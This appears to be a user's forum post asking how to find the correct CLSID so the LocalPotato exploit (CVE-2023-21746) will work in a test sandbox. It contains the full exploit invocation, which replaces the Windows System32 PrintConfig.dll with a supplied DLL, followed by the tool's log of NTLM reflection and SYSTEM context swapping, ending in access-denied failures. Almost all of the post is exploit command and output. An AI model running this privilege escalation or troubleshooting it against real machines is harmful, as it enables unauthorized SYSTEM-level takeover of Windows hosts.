No offense, how do I get the correct CLSID from PrintConfig.dll or from the sandbox where I want to test?
I generated one: {e60687f7-01a1-40aa-86ac-db1cbf673334}
```
C:\Users\testing\Desktop\4.7.2>LocalPotato.exe -i C:\Users\testing\Downloads\x64.dll -o C:\Windows\System32\spool\drivers\x64\3\PrintConfig.dll -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
LocalPotato (aka CVE-2023-21746 & HTTP/WebDAV)
by splinter_code & decoder_it
[] Objref Moniker Display Name = objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGAQAAAAAAAABjde89w5iZzGMBR4la7cLsAVAAAAADZB2Utz50rls7uy4AGAAHAEUAUgBJAFQARQBSAE0AAAAHADEAOQAyAC4AMQA2ADgALgA3ADUALgAzAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[] Calling CoGetInstanceFromIStorage with CLSID:{e60687f7-01a1-40aa-86ac-db1cbf673334}
[] Marshalling the IStorage object... IStorageTrigger written: 100 bytes
[] Received DCOM NTLM type 1 authentication from the privileged client
[] Connected to the SMB server with ip 127.0.0.1 and port 445
[+] SMB Client Auth Context swapped with SYSTEM
[+] RPC Server Auth Context swapped with the Current User
[] Received DCOM NTLM type 3 authentication from the privileged client
[!] SMB reflected DCOM authentication failed with status code 0xc0000022
[!] SMB Connect Tree: \127.0.0.1\c$ failed with status code 0xc0000203
C:\Users\testing\Desktop\4.7.2>
```